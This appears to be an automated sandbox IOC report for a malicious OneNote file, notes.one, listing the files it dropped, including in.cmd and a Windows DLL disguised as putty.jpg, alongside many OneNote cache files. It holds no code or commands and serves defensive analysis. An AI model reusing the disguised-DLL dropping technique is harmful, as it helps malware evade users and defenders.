Automated Malware Analysis IOC Report for

Files

File Path

Type

Category

Malicious

notes.one

data

initial sample

C:\ProgramData\in.cmd

ASCII text, with CRLF line terminators

dropped

C:\ProgramData\putty.jpg

PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows

dropped

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\064969FC-AFD0-4F49-92AA-9AFA4DCD48CC

XML 1.0 document, ASCII text, with CRLF, CR line terminators

dropped

C:\Users\user\AppData\Local\Microsoft\Office\16.0\onenote.exe_Rules.xml

XML 1.0 document, ASCII text, with very long lines (65536), with no line terminators

dropped

C:\Users\user\AppData\Local\Microsoft\Office\OTele\onenote.exe.db

SQLite 3.x database, last written using SQLite version 3023002, writer version 2, read version 2, file counter 2, database pages 1, cookie 0, schema 0, largest root page 1, unknown 0 encoding, version-valid-for 2

dropped

C:\Users\user\AppData\Local\Microsoft\Office\OTele\onenote.exe.db-journal

SQLite Rollback Journal

dropped

C:\Users\user\AppData\Local\Microsoft\Office\OTele\onenote.exe.db-shm

data

dropped

C:\Users\user\AppData\Local\Microsoft\Office\OTele\onenote.exe.db-wal

SQLite Write-Ahead Log, version 3007000

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\Backup\My Notebook\Quick Notes.one (On 07-02-2023).one (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\Backup\My Notebook\~Quick Notes.one.onebackupconstruction

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\Backup\Open Sections\notes.one (On 07-02-2023).one (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\Backup\Open Sections\~notes.one.onebackupconstruction

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000000.bin

OpenPGP Public Key

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000001.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000002.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000003.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000004.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000005.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000006.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000007.bin (copy)

PNG image data, 40 x 40, 8-bit/color RGBA, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000008.bin (copy)

PNG image data, 1692 x 810, 8-bit/color RGBA, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000009.bin (copy)

GIF image data, version 89a, 1012 x 327

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000A.bin (copy)

ASCII text, with very long lines (380), with no line terminators

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000B.bin (copy)

PNG image data, 1692 x 810, 8-bit/color RGBA, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000C.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000D.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000E.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000F.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000G.bin (copy)

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000H.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000I.bin (copy)

JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:19:29], progressive, precision 8, 221x792, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000J.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000K.bin (copy)

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000L.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000M.bin (copy)

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000N.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000O.bin (copy)

JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:18:09], progressive, precision 8, 164x641, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000P.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000Q.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000R.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000S.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000T.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000U.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000V.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000010.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000011.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000012.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000013.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000014.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000015.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000016.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000017.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000018.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000019.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001A.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001B.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001C.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001D.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001E.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001F.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001G.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001H.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001I.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001J.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001K.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001L.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001M.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001N.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001O.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001P.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001Q.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001R.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001S.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001T.bin (copy)

JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:06:24], progressive, precision 8, 38x792, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001U.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001V.bin (copy)

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000020.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000021.bin (copy)

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000022.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000023.bin (copy)

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000024.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000025.bin (copy)

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000026.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000027.bin (copy)

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000028.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000029.bin (copy)

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002A.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002B.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002C.bin (copy)

JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 814x105, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002D.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002E.bin (copy)

JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 728x77, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002F.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002G.bin (copy)

JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 69x630, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002H.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002I.bin (copy)

JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 105x441, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002J.bin (copy)

JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 76x97, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002K.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002L.bin (copy)

JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 95x498, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002M.bin (copy)

JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 700x114, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002N.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002O.bin (copy)

PNG image data, 813 x 99, 8-bit/color RGBA, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002P.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002Q.bin (copy)

JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 780x107, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002R.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002S.bin (copy)

JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 613x144, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002T.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002U.bin (copy)

JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 276x139, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002V.bin (copy)

OpenPGP Public Key

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000030.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000031.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000032.bin (copy)

OpenPGP Secret Key

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000033.bin (copy)

OpenPGP Public Key

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000034.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000035.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000036.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000037.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000038.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000039.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003A.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003B.bin (copy)

big endian ispell hash file (?), 8-bit, no capitalization, 26 flags

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003C.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003D.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003E.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003F.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003G.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003H.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003I.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003J.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003K.bin (copy)

OpenPGP Secret Key

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003L.bin (copy)

OpenPGP Public Key

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003M.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003N.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003O.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003P.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003Q.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003R.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003S.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003T.bin (copy)

big endian ispell hash file (?), 8-bit, no capitalization, 26 flags

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003U.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003V.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000040.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000041.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000042.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000043.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000044.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000045.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000046.bin (copy)

OpenPGP Secret Key

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000047.bin (copy)

big endian ispell hash file (?), 8-bit, no capitalization, 26 flags

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000048.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000049.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004A.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004B.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004C.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004D.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004E.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004F.bin (copy)

OpenPGP Secret Key

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004G.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004H.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004I.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004J.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004K.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004L.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004M.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004N.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004O.bin (copy)

JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 814x45, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004P.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004Q.bin (copy)

JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 262x277, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004R.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004S.bin (copy)

JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 70x626, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004T.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004U.bin (copy)

PNG image data, 177 x 123, 8-bit/color RGBA, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004V.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000050.bin (copy)

JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 17x608, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000051.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000052.bin (copy)

JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 357x69, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000053.bin (copy)

JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 14x341, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000054.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000055.bin (copy)

JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:15:20], progressive, precision 8, 604x784, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000056.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000057.bin (copy)

JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:13:06], progressive, precision 8, 570x779, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000058.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000059.bin (copy)

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005A.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005B.bin (copy)

PNG image data, 40 x 623, 8-bit colormap, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005C.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005D.bin (copy)

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005E.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005F.bin (copy)

JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:10:32], progressive, precision 8, 594x773, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005G.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005H.bin (copy)

JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:12:29], progressive, precision 8, 598x766, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005I.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005J.bin (copy)

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005K.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005L.bin (copy)

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005M.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005N.bin (copy)

PNG image data, 60 x 336, 4-bit colormap, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005O.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005P.bin (copy)

PNG image data, 40 x 617, 8-bit colormap, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005Q.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005R.bin (copy)

PNG image data, 50 x 600, 8-bit colormap, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005S.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005T.bin (copy)

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005U.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005V.bin (copy)

PNG image data, 77 x 627, 8-bit colormap, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000060.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000061.bin (copy)

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000062.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000063.bin (copy)

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000064.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000065.bin (copy)

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000066.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000067.bin (copy)

JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:05:55], progressive, precision 8, 612x618, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000068.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000069.bin (copy)

PNG image data, 176 x 513, 8-bit colormap, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006A.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006B.bin (copy)

PNG image data, 40 x 650, 8-bit colormap, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006C.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006D.bin (copy)

JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:27:10], progressive, precision 8, 102x792, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006E.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006F.bin (copy)

